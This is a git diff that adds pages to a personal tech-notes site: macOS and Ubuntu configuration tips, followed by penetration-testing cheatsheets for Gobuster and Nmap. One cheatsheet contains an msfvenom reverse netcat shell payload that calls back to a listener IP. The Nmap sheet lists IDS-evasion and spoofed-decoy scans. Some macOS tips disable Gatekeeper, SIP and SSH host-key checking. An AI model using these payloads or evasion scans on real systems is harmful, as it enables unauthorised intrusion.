+Unattended-Upgrade::Remove-New-Unused-Dependencies "true";
+Unattended-Upgrade::Remove-Unused-Dependencies "true";
+Unattended-Upgrade::Automatic-Reboot "true";
+Unattended-Upgrade::Automatic-Reboot-WithUsers "true";
+Unattended-Upgrade::Automatic-Reboot-Time "06:00";
+// Acquire::http::Dl-Limit "70";
+// Unattended-Upgrade::SyslogEnable "false";
+// Unattended-Upgrade::SyslogFacility "daemon";
+// Unattended-Upgrade::OnlyOnACPower "true";
+// Unattended-Upgrade::Skip-Updates-On-Metered-Connections "true";
+// Unattended-Upgrade::Verbose "false";
+// Unattended-Upgrade::Debug "false";
+// Unattended-Upgrade::Allow-downgrade "false";
+
Automatic call via /etc/apt/apt.conf.d/20auto-upgrades
echo unattended-upgrades unattended-upgrades/enable_auto_updates boolean true | sudo debconf-set-selections
+sudo dpkg-reconfigure -f noninteractive unattended-upgrades
+
Check the /etc/apt/apt.conf.d/20auto-upgrades for those 2 lines:
APT::Periodic::Update-Package-Lists "1" ;
+APT::Periodic::Unattended-Upgrade "1" ;
+
Manual Run:
sudo unattended-upgrade -d
+
To enable unattended-upgrade use the following command:
sudo dpkg-reconfigure --priority= low unattended-upgrades
+
Back to top
\ No newline at end of file
diff --git a/logo.jpg b/logo.jpg
new file mode 100644
index 000000000..973a5d0e4
Binary files /dev/null and b/logo.jpg differ
diff --git a/logo/chart-donut-variant.png b/logo/chart-donut-variant.png
new file mode 100644
index 000000000..2d9549e62
Binary files /dev/null and b/logo/chart-donut-variant.png differ
diff --git a/logo/chart-donut-variant.svg b/logo/chart-donut-variant.svg
new file mode 100644
index 000000000..de2d79534
--- /dev/null
+++ b/logo/chart-donut-variant.svg
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/logo/chart-donut-variant_transperent.png b/logo/chart-donut-variant_transperent.png
new file mode 100644
index 000000000..84312f36d
Binary files /dev/null and b/logo/chart-donut-variant_transperent.png differ
diff --git a/mac-os/applications-tweaks/index.html b/mac-os/applications-tweaks/index.html
new file mode 100644
index 000000000..7305b7a5d
--- /dev/null
+++ b/mac-os/applications-tweaks/index.html
@@ -0,0 +1,169 @@
+ Applications Tweaks - 3os macOS Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-06-25 Applications Tweaks Running Multi Instances of an Application Launch the Script Editor choose temporary folder
Copy the command to be executed to the Script Editor
do shell script "open -n <path to application>"
+
Example
do shell script "open -n /Applications/'Visual Studio Code.app'"
File > Export
Use the following settings:
Export As: Your New Application Name Where: Applications File Format: Application Change The Icon of Your New Application:
In Finder, go to the Applications folder. Right-click on the new Your New Application application we just created and click Get Info . Drag the original application icon (or any other) to the icon in the left corner of the "Get Info" window.
Launch Firefox Profile Manager as an Application Launch the Script Editor and choose a temporary folder
Copy the command to be executed to the Script Editor
do shell script "/Applications/Firefox.app/Contents/MacOS/firefox -ProfileManager &> /dev/null &"
+
File > Export
Use the following settings:
Save As: Firefox Profile Manager Where: Applications File Format: Application Change The Icon of Your New Firefox Profile Manager Application:
In Finder, go to the Applications folder. Right-click on the new Firefox Profile Manager application we just created and click Get Info . Drag the original application to the icon in the left corner of the "Get Info" window.
Back to top
\ No newline at end of file
diff --git a/mac-os/enable-root-user/index.html b/mac-os/enable-root-user/index.html
new file mode 100644
index 000000000..4493a24aa
--- /dev/null
+++ b/mac-os/enable-root-user/index.html
@@ -0,0 +1,167 @@
+ Enable Root User - 3os macOS Authors: fire1ce | Created: 2022-06-18 | Last update: 2022-06-19 Enable or Disable the Root User on macOS Mac administrators can use the root user account to perform tasks that require access to more areas of the system.
The user account named "root" is a superuser with read and write privileges to more areas of the system, including files in other macOS user accounts. The root user is disabled by default. If you can log in to your Mac with an administrator account, you can enable the root user, then log in as the root user to complete your task.
How to Enable the Root User System Preferences
> Users & Groups
Click lock
icon, enter an administrator name and password. Click Login Options
. Click Join
at Network Account Server
.
Click Open Directory Utility
.
Click lock icon in the Directory Utility window, then enter an administrator name and password.
From the menu bar in Directory Utility: Choose Edit > Enable Root User, then enter the password that you want to use for the root user. Or choose Edit > Disable Root User.
How to Disable the Root User To Disable the Root User repeat the steps above, but change the last step to Disable Root User.
Login as The Root User When the root user is enabled, you have the privileges of the root user only while logged in as the root user.
Log out of your current account, then log in as the root user, using the user name "root" and the password you created for the root user.
Back to top
\ No newline at end of file
diff --git a/mac-os/homebrew/brewup/index.html b/mac-os/homebrew/brewup/index.html
new file mode 100644
index 000000000..5c13e2be5
--- /dev/null
+++ b/mac-os/homebrew/brewup/index.html
@@ -0,0 +1,175 @@
+ BrewUp - 3os macos homebrew bash github Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 BrewUp
Description Brewup script is a Bash script that uses Homebrew - The Missing Package Manager for macOS as its base. Brewup uses GitHub as a "backup" of a config file which contains all installed Taps, Formulas, Casks and App Store Apps on your macOS. It also allows the use of GitHub's main function of retaining changes so you can always look up a package that was installed some time ago when you just forgot what it was exactly.
Visit us at 3os.org for more guides and tips for macOS
What Brewup Actually Does It just runs few Brew functionality automatically:
brew doctor brew missing brew upgrade brew cask upgrade brew cleanup App Store Updates Creating Updated Brewfile Pushing changes to Git Requirements Installing Use this repository as template, it will create a Fork
for you and you can start using it.
git clone <paste the your repo url here>
+
sudo ln -s ${ PWD } /BrewUp/brewup.sh /usr/local/bin/brewup
+
Note: if /usr/local/bin/
is missing create it with
sudo mkdir /usr/local/bin/
+
Usage just run from terminal:
Install all apps from BrewFile:
cd to local location you cloned your repository and run:
brew bundle install --file= <BrewFile Name>
+
License MIT License Copyright © Stas Kosatuhin @2019
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Back to top
\ No newline at end of file
diff --git a/mac-os/homebrew/homebrew-snippets/index.html b/mac-os/homebrew/homebrew-snippets/index.html
new file mode 100644
index 000000000..e6ab10226
--- /dev/null
+++ b/mac-os/homebrew/homebrew-snippets/index.html
@@ -0,0 +1,173 @@
+ Brew Snippets - 3os macOS homebrew Authors: fire1ce | Created: 2021-09-02 | Last update: 2022-06-18 Brew Snippets Brew Pins - Freeze and Unfreeze Specific Packages This will allow you to pin (freeze updates for) specific packages in your Homebrew installation and then unfreeze them.
List of packages that you freeze
Freeze Version
Unfreeze Version
Uninstall Brew Package and Dependencies Remove package's dependencies (does not remove package):
brew deps [ FORMULA] | xargs brew remove --ignore-dependencies
+
Remove package:
Reinstall missing libraries:
brew missing | cut -d: -f2 | sort | uniq | xargs brew install
+
Back to top
\ No newline at end of file
diff --git a/mac-os/import-ssh-keys-keychain/index.html b/mac-os/import-ssh-keys-keychain/index.html
new file mode 100644
index 000000000..945fc7ad5
--- /dev/null
+++ b/mac-os/import-ssh-keys-keychain/index.html
@@ -0,0 +1,178 @@
+ SSH Passphrase to Keychain - 3os macos Authors: fire1ce | Created: 2022-06-18 | Last update: 2023-01-17 Import ed25519/RSA Keys Passphrase to macOS Keychain First, you need to add the keys to the keychain
with the following steps:
Copy your ed25519, ed25519.pub
/ id_rsa, id_rsa.pub
to ~/.ssh/
folder
Store the key in the MacOS Keychain
Enter your key passphrase. You won't be asked for it again.
List all keys in the keychain:
If you haven't already, create an ~/.ssh/config
file. In other words, in the .ssh directory in your home dir, make a file called config.
At ~/.ssh/config
file, add the following lines at the top of the config:
Store the key in the MacOS Keychain
The UseKeychain yes is the key part, which tells SSH to look in your macOS keychain for the key passphrase.
That's it! Next time you load any ssh connection, it will try the private keys you've specified, and it will look for their passphrase in the macOS keychain. No passphrase typing required.
Back to top
\ No newline at end of file
diff --git a/mac-os/python/pyenv-virtualenv/index.html b/mac-os/python/pyenv-virtualenv/index.html
new file mode 100644
index 000000000..534031b24
--- /dev/null
+++ b/mac-os/python/pyenv-virtualenv/index.html
@@ -0,0 +1,202 @@
+ Pyenv-virtualenv Multi Version - 3os maco python Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Pyenv-virtualenv - Multiple Version Python Virtual Environment Manager For easy non-multiple version Python Virtual Environment follow this Venv Python Virtual Environment
Intro Using and developing with Python on macOS sometimes may be frustrating...
The reason for that is that macOS uses Python 2 for its core system with pip as a package manager. When Xcode Command Line Tools are installed, Python 3 and the pip3 package manager will be available at the CLI. When using Python 2, Python 3 and their package managers this way, all the packages will be installed at the system level and may affect the native packages and their dependencies, which can break or lead to unwanted bugs in the OS.
The right way to use Python on macOS is to use virtual environments for Python. This way, all the system-related versions of Python and their packages won't be affected or used by you.
Installing and configuring pyenv, pyenv-virtualenv In order to use pyenv, pyenv-virtualenv without conflicting with the native macOS python we need to add some configuration to our ~/.zshrc config (for mac os catalina) or your bash config if you are still using bash.
It's very important to maintain the order of the configuration for the loading order
First of all we need to include your Executable Paths. In the example we added all the common paths, including the paths for pyenv, pyenv-virtualenv. If you have any other path that you use, you can add them at the same line or create a new line below this one. Second to Executable Paths we will add two if statements that will check if the pyenv,pyenv-virtualenv are installed, if they are it will load them. If they aren't and you are using the same zsh or bash config it will ignore loading them Third is a fix for brew, brew doctor . When using this method it may conflict with brew as it uses python as well. If you run run brew doctor without the fix, it will show config warnings related to the python configuration files. Configuration for ~/.zshrc or ~/.zprofile
# Executable Paths
+## Global
+export PATH="/usr/local/bin:/usr/local/sbin:/Users/${USER}/.local/bin:/usr/bin:/usr/sbin:/bin:/sbin:$PATH"
+
+## Curl
+export PATH="/opt/homebrew/opt/curl/bin:$PATH"
+export LDFLAGS="-L/opt/homebrew/opt/curl/lib"
+export CPPFLAGS="-I/opt/homebrew/opt/curl/include"
+export PKG_CONFIG_PATH="/opt/homebrew/opt/curl/lib/pkgconfig"
+
+# pyenv, pyenv-virtualenv
+## Initiating pyenv and fix Brew Doctor: "Warning: "config" scripts exist outside your system or Homebrew directories"
+if which pyenv >/dev/null; then
+ eval "$(pyenv init --path)"
+ alias brew='env PATH=${PATH//$(pyenv root)\/shims:/} brew'
+fi
+
+## Initiating pyenv-virtualenv
+if which pyenv-virtualenv-init >/dev/null; then
+ eval "$(pyenv virtualenv-init -)"
+fi
+
After you saved your configuration the best way to load it is to close your terminal session and open it again. This will load the session with your updated configuration. There should be no errors at the new session.
This will install both pyenv and pyenv-virtualenv
brew install pyenv-virtualenv
+
Test if pyenv loaded correctly
After the installation we would like to set a system-level Python version; you can choose the default from the list available from pyenv
List available Python Version and find the version suited for your needs:
Install the Required Python Version (Example: version 3.9.5) as the system default
Set it as global
You can install multiple versions of Python at the same time.
List all installed python versions and virtual environments and their python versions
Now let's test our system Python version we set before, it should be the version you choose as Global before
So far we cleaned your system and installed and configured pyenv, pyenv-virtualenv.
How to use pyenv-virtualenv Now let's understand how to use Python Virtual Environment with pyenv-virtualenv
Full documentation can be found at the original repo at git hub: pyenv-virtualenv github
We will list here some basic examples for a quick start and basic understanding
To create a virtualenv for the Python version used with pyenv, run pyenv virtualenv, specifying the Python version you want and the name of the virtualenv directory. For example,
pyenv virtualenv 3.9.5 my - project - name
+
This will create a virtualenv based on Python 3.9.5 under $(pyenv root)/versions in a folder called my-project-name
Activating virtualenv automatically for project
The best way we found to activate the virtualenv at your project is to link the projects directory to the virtualenv.
cd to the project's directory and link the virtualenv for example my-project-name virtualenv
pyenv local my - project - name
+
This will activate the linked virtualenv every time you cd to this directory automatically From now you can use pip to install any packages you need for your project, the location of the installed packages will be at $(pyenv root)/versions/
Activating virtualenv manually for project
You can also activate and deactivate a pyenv virtualenv manually:
pyenv activate < virtualenv name >
+pyenv deactivate
+
This will allow you to use multiple versions of Python or packages for the same project
List existing virtualenvs
Delete existing virtualenv
pyenv uninstall my - virtual - env
+
or
pyenv virtualenv - delete my - virtual - env
+
You and your macOS should be ready for using Python the right way without conflicting with any system Python or the Xcode Command Line Tools (used by brew)
Back to top
\ No newline at end of file
diff --git a/mac-os/terminal-snippets/index.html b/mac-os/terminal-snippets/index.html
new file mode 100644
index 000000000..8e01dc5af
--- /dev/null
+++ b/mac-os/terminal-snippets/index.html
@@ -0,0 +1,192 @@
+ Terminal Snippets - 3os macos Authors: fire1ce | Created: 2022-06-18 | Last update: 2022-08-02 Terminal Snippets Terminal usage snippets for macOS. This is a collection of snippets that I use without specific category.
Install macOS Updates via CLI Shell Safe rm Source shell-safe-rm github
A much safer replacement of shell rm
with ALMOST FULL features of the origin rm
command.
Initially developed on Mac OS X, then tested on Linux.
Using safe-rm
, the files or directories you choose to remove will move to $HOME/.Trash
instead of simply deleting them. You could put them back whenever you want manually.
If a file or directory with the same name already exists in the Trash, the name of newly-deleted items will be ended with the current date and time.
Install with npm:
Add Alias to your zshrc config
Disable StrictHostKeyChecking in SSH To disable strict host checking on OS X for the current user, create or edit ~/.ssh/ssh_config
and add the following lines:
StrictHostKeyChecking no
+
Set macOS Hostname via CLI sudo scutil --set HostName <NewHostNameHere>
+
Syntax Highlighting for Nano Install Nano from homebrew Create ~/.nanorc
file with the syntax below
brew install nano
+touch ~/.nanorc
+
Edit ~/.nanorc
file with the syntax below
Disable/Enable Gatekeeper Disable Gatekeeper
sudo spctl --master-disable
+
Enable Gatekeeper
sudo spctl --master-enable
+
Check Status
Disable/Enable SIP (System Integrity Protection) Reboot your Mac into Recovery Mode by restarting your computer and holding down Command+R until the Apple logo appears on your screen. Click Utilities > Terminal. In the Terminal window, type in:
Status:
Disable:
Enable:
Press Enter and restart your Mac.
Installing rbenv (Ruby sandbox) - a Ruby alternative to the one that macOS uses Install rbenv with brew
Add eval "$(rbenv init -)"
to the end of ~/.zshrc
or ~/.bash_profile
Install a ruby version
Select a ruby version by rbenv
Open a new terminal window
Verify that the right gem folder is being used with gem env home
(should report something in your user folder not system wide)
List listening Ports and Programs and Users (netstat like) sudo lsof -i -P | grep -i "listen"
+
Disable "last login" at Terminal cd ~/
+touch .hushlogin
+
Create the missing /Users/Shared folder
sudo mkdir -p /Users/Shared/
+
Fix permissions for the /Users/Shared folder
sudo chmod -R 1777 /Users/Shared
+
iTerm2 Using Alt/Cmd + Right/Left Arrow in iTerm2
Go to iTerm Preferences
→ Profiles
, select your profile, then the Keys
tab. click Load Preset
... and choose Natural Text Editing
.
Remove the Right Arrow Before the Cursor Line
you can turn it off by going in to Preferences
> Profiles
> (your profile) > Terminal
, scroll down to Shell Integration
, and turn off Show mark indicators
.
Clear Google Drive cache rm -rf ~/Library/Application\ Support/Google/DriveFS/[ 0 -9] *
+
Back to top
\ No newline at end of file
diff --git a/mac-os/touch-id-for-sudo/index.html b/mac-os/touch-id-for-sudo/index.html
new file mode 100644
index 000000000..a2215374e
--- /dev/null
+++ b/mac-os/touch-id-for-sudo/index.html
@@ -0,0 +1,172 @@
+ TouchID for sudo - 3os macOS iTerm2 terminal touchID Authors: fire1ce | Created: 2022-06-19 | Last update: 2022-06-19 TouchID for sudo Apple devices such as MacBooks and some Apple Magic Keyboards have a fingerprint - Touch ID scanner that can be used to authenticate a user with a touch of a finger. This functionality isn't available when using sudo
to run commands. You have to enter your password every time you run commands with high privileges.
We can enable TouchID for sudo with a simple config change. This will allow you to use Touch ID to authenticate with sudo
without entering your password including the authentication with Apple Watch.
Display Link - Known Issue
As of the writing of this article, the Display Link Driver will prevent the use of Touch ID for sudo when using the Display link device. It will work when the Display Link device isn't connected. This is a known issue.
Enable TouchID for sudo Open in text editor file with sudo privileges /etc/pam.d/sudo
. In the next example we will use the nano
editor.
sudo nano /etc/pam.d/sudo
+
Add at the top of the config file this line:
auth sufficient pam_tid.so
+
Your config should look like this:
Save and Exit.
You can test your TouchID prompt in terminal by opening new session and running:
Enable TouchID Support in iTerm2 In order to enable TouchID support in iTerm2, you need to complete the above section and then follow the steps below:
Go to iTerm2
-> Preferences
-> Advanced
and search for:
Allow session to survive
+
Change Allow session to survive logging out and back in. to No
You can test your TouchID prompt in iTerm2 by opening new session and running:
Back to top
\ No newline at end of file
diff --git a/mac-os/ui-tweaks/index.html b/mac-os/ui-tweaks/index.html
new file mode 100644
index 000000000..145d003c8
--- /dev/null
+++ b/mac-os/ui-tweaks/index.html
@@ -0,0 +1,179 @@
+ UI Tweaks - 3os macOS Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-06-18 UI Tweaks Hide All The Icons On Your Desktop Disable Icons:
defaults write com.apple.finder CreateDesktop false
+killall Finder
+
Enable Icons:
defaults write com.apple.finder CreateDesktop true
+killall Finder
+
Change the Launchpad Grid Layout Change the springboard-columns and springboard-rows values according to your preference
defaults write com.apple.dock springboard-columns -int 8
+defaults write com.apple.dock springboard-rows -int 6
+defaults write com.apple.dock ResetLaunchPad -bool TRUE
+killall Dock
+
Reset Launchpad Icons Sort defaults write com.apple.dock ResetLaunchPad -bool true; killall Dock
+
Set the Same View Options
for all Finder windows First, we want to set the default view options for all new Finder windows. To do so, open Finder and click on the view setting that you want to use. The settings are four icons at the top of your Finder window. If you don't see the Finder toolbar type:
After selecting the option you want, type:
to open the view options window.
Make sure you check the top two checkboxes that say Always open in list view and Browse in list view. Keep in mind it will reflect whichever view you've selected.
Now click the button at the bottom that says "Use as Defaults".
Delete all .DS_Store files on your computer Chances are you've opened some Finder windows in the past. Individual folder options will override this default setting that we just set.
In order to reset your folder settings across the entire machine we have to delete all .DS_Store files. This will ensure that all folders start fresh. Open up the Terminal application (Applications/Utilities/Terminal), and type:
sudo find / -name .DS_Store -delete 2 >/dev/null ; killall Finder
+
Note: In the future, whenever you switch views, it will automatically save in the new .DS_Store file. This will override the default settings.
Back to top
\ No newline at end of file
diff --git a/penetration-testing/cheatsheets/cli-commands-collation/index.html b/penetration-testing/cheatsheets/cli-commands-collation/index.html
new file mode 100644
index 000000000..3cfa4ad86
--- /dev/null
+++ b/penetration-testing/cheatsheets/cli-commands-collation/index.html
@@ -0,0 +1,172 @@
+ Cli Commands Collation - 3os pt penetration-testing cli commands collation Authors: fire1ce | Created: 2021-09-02 | Last update: 2022-08-05 Cli Commands Collation Find PTR Owner - Reversal Look Up dig 0 .168.192.in-addr.arpa. NS
+
Listen for Ping/icmp on interface sudo tcpdump ip proto \\ icmp -i eth0
+
Reverse Netcat Shell Payload R(row)
msfvenom -p cmd/unix/reverse_netcat lhost = 10 .11.19.49 lport = 4444 R
+
listener:
NFS Show Mount showmount -e 10 .10.87.232
+
Back to top
\ No newline at end of file
diff --git a/penetration-testing/cheatsheets/gobuster-cheatsheet/index.html b/penetration-testing/cheatsheets/gobuster-cheatsheet/index.html
new file mode 100644
index 000000000..1c003965f
--- /dev/null
+++ b/penetration-testing/cheatsheets/gobuster-cheatsheet/index.html
@@ -0,0 +1,176 @@
+ Gobuster CheatSheet - 3os penetration-testing tools cheatsheet Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Gobuster CheatSheet Common Gobuster Commands dir Mode gobuster dir -u https://example.com -w ~/wordlists/shortlist.txt
+
With content length
gobuster dir -u https://example.com -w ~/wordlists/shortlist.txt -l
+
dns Mode gobuster dns -d example.com -t 50 -w common-names.txt
+
gobuster dns -d example.com-w ~/wordlists/subdomains.txt
+
With Show IP
gobuster dns -d example.com -w ~/wordlists/subdomains.txt -i
+
Base domain validation warning when the base domain fails to resolve
gobuster dns -d example.com -w ~/wordlists/subdomains.txt -i
+
Wildcard DNS is also detected properly:
gobuster dns -d 0 .0.1.xip.io -w ~/wordlists/subdomains.txt
+
vhost Mode gobuster vhost -u https://example.com -w common-vhosts.txt
+
s3 Mode
gobuster s3 -w bucket-names.txt
+
Available Modes Switch Description dir the classic directory brute-forcing mode dns DNS subdomain brute-forcing mode s3 Enumerate open S3 buckets and look for existence and bucket listings vhost virtual host brute-forcing mode (not the same as DNS!)
Global Flags Short Switch Long Switch Description -z --no-progress Don't display progress -o --output string Output file to write results to (defaults to stdout) -q --quiet Don't print the banner and other noise -t --threads int Number of concurrent threads (default 10) -i --show-ips Show IP addresses --delay duration DNS resolver timeout (default 1s) -v, --verbose Verbose output (errors) -w --wordlist string Path to the wordlist
DNS Mode Options Short Switch Long Switch Description -h, --help help for dns -d, --domain string The target domain -r, --resolver string Use custom DNS server (format server.com or server.com:port) -c, --show-cname Show CNAME records (cannot be used with '-i' option) -i, --show-ips Show IP addresses --timeout duration DNS resolver timeout (default 1s)
DIR Mode Options Short Switch Long Switch Description -h, --help help for dir -f, --add-slash Append / to each request -c, --cookies string Cookies to use for the requests -e, --expanded Expanded mode, print full URLs -x, --extensions string File extension(s) to search for -r, --follow-redirect Follow redirects -H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' -l, --include-length Include the length of the body in the output -k, --no-tls-validation Skip TLS certificate verification -n, --no-status Don't print status codes -P, --password string Password for Basic Auth -p, --proxy string Proxy to use for requests [http(s)://host:port] -s, --status-codes string Positive status codes (will be overwritten with status-codes-blacklist if set) (default "200,204,301,302,307,401,403") -b, --status-codes-blacklist string Negative status codes (will override status-codes if set) --timeout duration HTTP Timeout (default 10s) -u, --url string The target URL -a, --useragent string Set the User-Agent string (default "gobuster/3.1.0") -U, --username string Username for Basic Auth -d, --discover-backup Upon finding a file search for backup files --wildcard Force continued operation when wildcard found
vhost Mode Options Short Switch Long Switch Description -h --help help for vhost -c --cookies string Cookies to use for the requests -r --follow-redirect Follow redirects -H --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' -k --no-tls-validation Skip TLS certificate verification -P --password string Password for Basic Auth -p --proxy string Proxy to use for requests [http(s)://host:port] --timeout duration HTTP Timeout (default 10s) -u --url string The target URL -a --useragent string Set the User-Agent string (default "gobuster/3.1.0") -U --username string Username for Basic Auth
Back to top
\ No newline at end of file
diff --git a/penetration-testing/cheatsheets/nmap-cheatsheet/index.html b/penetration-testing/cheatsheets/nmap-cheatsheet/index.html
new file mode 100644
index 000000000..93eb066fb
--- /dev/null
+++ b/penetration-testing/cheatsheets/nmap-cheatsheet/index.html
@@ -0,0 +1,180 @@
+ Nmap CheatSheet - 3os penetration-testing tools cheatsheet Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Nmap CheatSheet Common Nmap Commands Aggressive scan, single host, TCP SYN, :
nmap -n -sS -p- -T4 -Pn -A -v 192 .168.1.1
+
Ping Scan - Host discovery in subnet
nmap -sn -v 192 .168.0.0/24
+
Target Specification Switch Description Example nmap 192.168.1.1 Scan a single IP nmap 192.168.1.1 192.168.2.1 Scan specific IPs nmap scanme.nmap.org Scan a range nmap scanme.nmap.org Scan a domain nmap 192.168.1.0/24 Scan using CIDR notation -iL nmap -iL targets.txt Scan targets from a file -iR nmap -iR 100 Scan 100 random hosts --exclude nmap --exclude 192.168.1.1 Exclude listed hosts
Scan Techniques Switch Example Description -sS nmap 192.168.1.1 -sS TCP SYN port scan (Default) -sT nmap 192.168.1.1 -sT TCP connect port scan (Default without root privilege) -sU nmap 192.168.1.1 -sU UDP port scan -sA nmap 192.168.1.1 -sA TCP ACK port scan -sW nmap 192.168.1.1 -sW TCP Window port scan -sM nmap 192.168.1.1 -sM TCP Maimon port scan
Host Discovery Switch Description Example -sL nmap 192.168.1.1-3 -sL No Scan. List targets only -sn nmap 192.168.1.1/24 -sn Disable port scanning. Host discovery only. -Pn nmap 192.168.1.1-5 -Pn Disable host discovery. Port scan only. -PS nmap 192.168.1.1-5 -PS22-25,80 TCP SYN discovery on port x.Port 80 by default -PA nmap 192.168.1.1-5 -PA22-25,80 TCP ACK discovery on port x.Port 80 by default -PU nmap 192.168.1.1-5 -PU53 UDP discovery on port x.Port 40125 by default -PR nmap 192.168.1.1-1/24 -PR ARP discovery on local network -n nmap 192.168.1.1 -n Never do DNS resolution
Port Specification Switch Description Example -p nmap 192.168.1.1 -p 21 Port scan for port x -p nmap 192.168.1.1 -p 21-100 Port range -p nmap 192.168.1.1 -p U:53,T:21-25,80 Port scan multiple TCP and UDP ports -p nmap 192.168.1.1 -p- Port scan all ports -p nmap 192.168.1.1 -p http,https Port scan from service name -F nmap 192.168.1.1 -F Fast port scan (100 ports) --top-ports nmap 192.168.1.1 --top-ports 2000 Port scan the top x ports -p-65535 nmap 192.168.1.1 -p-65535 Leaving off initial port in range makes the scan start at port 1 -p0- nmap 192.168.1.1 -p0- Leaving off end port in range makes the scan go through to port 65535
Service and Version Detection Switch Description Example -sV nmap 192.168.1.1 -sV Attempts to determine the version of the service running on port -sV --version-intensity nmap 192.168.1.1 -sV --version-intensity 8 Intensity level 0 to 9. Higher number increases possibility of correctness -sV --version-light nmap 192.168.1.1 -sV --version-light Enable light mode. Lower possibility of correctness. Faster -sV --version-all nmap 192.168.1.1 -sV --version-all Enable intensity level 9. Higher possibility of correctness. Slower -A nmap 192.168.1.1 -A Enables OS detection, version detection, script scanning, and traceroute
OS Detection Switch Description Example -O nmap 192.168.1.1 -O Remote OS detection using TCP/IP stack fingerprinting -O --osscan-limit nmap 192.168.1.1 -O --osscan-limit If at least one open and one closed TCP port are not found it will not try OS detection against host -O --osscan-guess nmap 192.168.1.1 -O --osscan-guess Makes Nmap guess more aggressively -O --max-os-tries nmap 192.168.1.1 -O --max-os-tries 1 Set the maximum number x of OS detection tries against a target -A nmap 192.168.1.1 -A Enables OS detection, version detection, script scanning, and traceroute
Switch Description Example -T0 nmap 192.168.1.1 -T0 Paranoid (0) Intrusion Detection System evasion -T1 nmap 192.168.1.1 -T1 Sneaky (1) Intrusion Detection System evasion -T2 nmap 192.168.1.1 -T2 Polite (2) slows down the scan to use less bandwidth and use less target machine resources -T3 nmap 192.168.1.1 -T3 Normal (3) which is default speed -T4 nmap 192.168.1.1 -T4 Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network -T5 nmap 192.168.1.1 -T5 Insane (5) speeds scan; assumes you are on an extraordinarily fast network -------- -------- ------------------------------------------------------------------------------------------- --host-timeout 1s; 4m; 2h Give up on target after this long --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout 1s; 4m; 2h Specifies probe round trip time --min-hostgroup/max-hostgroup <size 50; 1024 Parallel host scan group sizes --min-parallelism/max-parallelism 10; 1 Probe parallelization --scan-delay/--max-scan-delay 20ms; 2s; 4m; 5h Adjust delay between probes --max-retries 3 Specify the maximum number of port scan probe retransmissions --min-rate 100 Send packets no slower than per second --max-rate 100 Send packets no faster than per second
NSE Scripts Switch Description Example -sC nmap 192.168.1.1 -sC Scan with default NSE scripts. Considered useful for discovery and safe --script default nmap 192.168.1.1 --script default Scan with default NSE scripts. Considered useful for discovery and safe --script nmap 192.168.1.1 --script=banner Scan with a single script. Example banner --script nmap 192.168.1.1 --script=http* Scan with a wildcard. Example http --script nmap 192.168.1.1 --script=http,banner Scan with two scripts. Example http and banner --script nmap 192.168.1.1 --script "not intrusive" Scan default, but remove intrusive scripts --script-args nmap --script snmp-sysdescr --script-args snmpcommunity=admin 192.168.1.1 NSE script with arguments
Useful NSE Script Examples Command Description nmap -Pn --script=http-sitemap-generator scanme.nmap.org http site map generator nmap -n -Pn -p 80 --open -sV -vvv --script banner,http-title -iR 1000 Fast search for random web servers nmap -Pn --script=dns-brute domain.com Brute forces DNS hostnames guessing subdomains nmap -n -Pn -vv -O -sV --script smb-enum,smb-ls,smb-mbenum,smb-os-discovery,smb-s ,smb-vuln,smbv2 -vv 192.168.1.1 Safe SMB scripts to run nmap --script whois* domain.com Whois query nmap -p80 --script http-unsafe-output-escaping scanme.nmap.org Detect cross site scripting vulnerabilities nmap -p80 --script http-sql-injection scanme.nmap.org Check for SQL injections
Firewall / IDS Evasion and Spoofing Switch Description Example -f nmap 192.168.1.1 -f Requested scan (including ping scans) use tiny fragmented IP packets. Harder for packet filters --mtu nmap 192.168.1.1 --mtu 32 Set your own offset size -D nmap -D 192.168.1.101,192.168.1.102, 192.168.1.103,192.168.1.23 192.168.1.1 Send scans from spoofed IPs -D nmap -D decoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ip Above example explained -S nmap -S www.microsoft.com www.facebook.com Scan Facebook from Microsoft (-e eth0 -Pn may be required) -g nmap -g 53 192.168.1.1 Use given source port number --proxies nmap --proxies http://192.168.1.1:8080
, http://192.168.1.2:8080
192.168.1.1 Relay connections through HTTP/SOCKS4 proxies --data-length nmap --data-length 200 192.168.1.1 Appends random data to sent packets
Example IDS Evasion command nmap -f -t 0 -n -Pn –data-length 200 -D 192 .168.1.101,192.168.1.102,192.168.1.103,192.168.1.23 192 .168.1.1
+
